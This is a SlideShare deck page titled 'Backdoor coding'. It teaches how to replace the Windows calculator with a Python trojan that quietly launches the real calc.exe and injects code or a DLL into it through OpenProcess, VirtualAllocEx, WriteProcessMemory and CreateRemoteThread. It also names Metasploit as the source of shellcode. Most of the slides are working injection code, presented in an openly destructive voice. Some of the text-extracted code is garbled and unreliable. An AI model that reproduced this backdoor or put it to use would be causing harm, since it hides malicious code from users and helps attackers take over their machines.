Backdoor coding
Download as PPT, PDF0 likes825 views
This document discusses creating a backdoor by disguising a malicious program as the calculator application. It describes using Python code to start the real calculator program while also running injection code to load additional malicious payloads into the process's memory without the user's knowledge. The code samples show how to launch the target process, allocate memory in its space, write the payload data, and inject it by creating a remote thread. The goal is to stealthily execute unauthorized code on a system by hijacking the trusted calculator program.
![def inject( pid, data, parameter = 0 ) :
# Get a handle to the process we are injecting into.
h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )
if not h_process:
print "[*] Couldn't acquire a handle to PID: %s" % pid
sys.exit(0)
arg_address = kernel32.VirtualAllocEx(h_process, 0, len(data),
VIRTUAL_MEM, PAGE_EXECUTE_READWRITE)
written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, data,
len(data), byref(written))
thread_id = c_ulong(0)
if not parameter:
start_address = arg_address
else:
h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
start_address = kernel32.GetProcAddress(h_kernel32,"LoadLibraryA")
parameter = arg_address
if not kernel32.CreateRemoteThread(h_process,None,0,start_address,parameter,0
,byref(thread_id)):
print "[*] Failed to inject the DLL. Exiting."
sys.exit(0)
return True](https://image.slidesharecdn.com/backdoor-140423181229-phpapp01/85/Backdoor-coding-6-320.jpg)
More Related Content
What's hot (20)
Similar to Backdoor coding (20)
Recently uploaded (20)
Backdoor coding
- 1. Backdoor Coding we're here to fuck shit up .. because it is more fun to blow shit up than keeping shit from blowing up and that's what hackers do ;)
- 2. We will name our backdoor calc.exe and move the original calc.exe to a different location. When the user attempts to use the calculator, she will be inadvertently running our backdoor, which in turn will start the proper calculator and thus not alert the user that anything is amiss.Open a new Python file, name it backdoor.py, and enter the following code :
- 3. import sys from ctypes import * from my_debugger_defines import * kernel32= windll.kernel32 PAGE_EXECUTE_READWRITE=x00000040 PROCESS_ALL_ACCESS =( 0x000F0000 | 0x00100000 0xFFF) VIRTUAL_MEM=( 0x1000 | 0x2000 ) # This is the original executable
- 4. path_to_exe= "C:calc.exe" startupinfo=STARTUPINFO() process_information=PROCESS_INFORMATION() creation_flags=CREATE_NEW_CONSOLE startupinfo.dwFlags=0x1 startupinfo.wShowWindow=0x0 startupinfo.cb=sizeof(startupinfo) # First things first, fire up that second process # and store its PID so that we can do our injection kernel32.CreateProcessA(path_to_exe, None, None, None, None, creation_flags, None, None, byref(startupinfo), byref(process_information)) pid = process_information.dwProcessId
- 5. Not too complicated, and there is no new code in there. Before we move into the DLL injection code, we are going to explore how we can hide the DLL itself before using it for the injection. Lets add our injection code to the backdoor; just tack it on right after the process-creation section. Our injection function will also be able to handle code or DLL injection; simply set the parameter flag to 1, and the data variable will then contain the path to the DLL. We arent going for clean here; were going for quick and dirty. Lets add the injection capabilities to our backdoor.py file.
- 6. def inject( pid, data, parameter = 0 ) : # Get a handle to the process we are injecting into. h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) ) if not h_process: print "[*] Couldn't acquire a handle to PID: %s" % pid sys.exit(0) arg_address = kernel32.VirtualAllocEx(h_process, 0, len(data), VIRTUAL_MEM, PAGE_EXECUTE_READWRITE) written = c_int(0) kernel32.WriteProcessMemory(h_process, arg_address, data, len(data), byref(written)) thread_id = c_ulong(0) if not parameter: start_address = arg_address else: h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll") start_address = kernel32.GetProcAddress(h_kernel32,"LoadLibraryA") parameter = arg_address if not kernel32.CreateRemoteThread(h_process,None,0,start_address,parameter,0 ,byref(thread_id)): print "[*] Failed to inject the DLL. Exiting." sys.exit(0) return True
- 7. We now have a supported injection function that can handle both code and DLL injection. Now its time to inject the pieces of shellcode. We can generate the shell code with metasploit . Thank you ...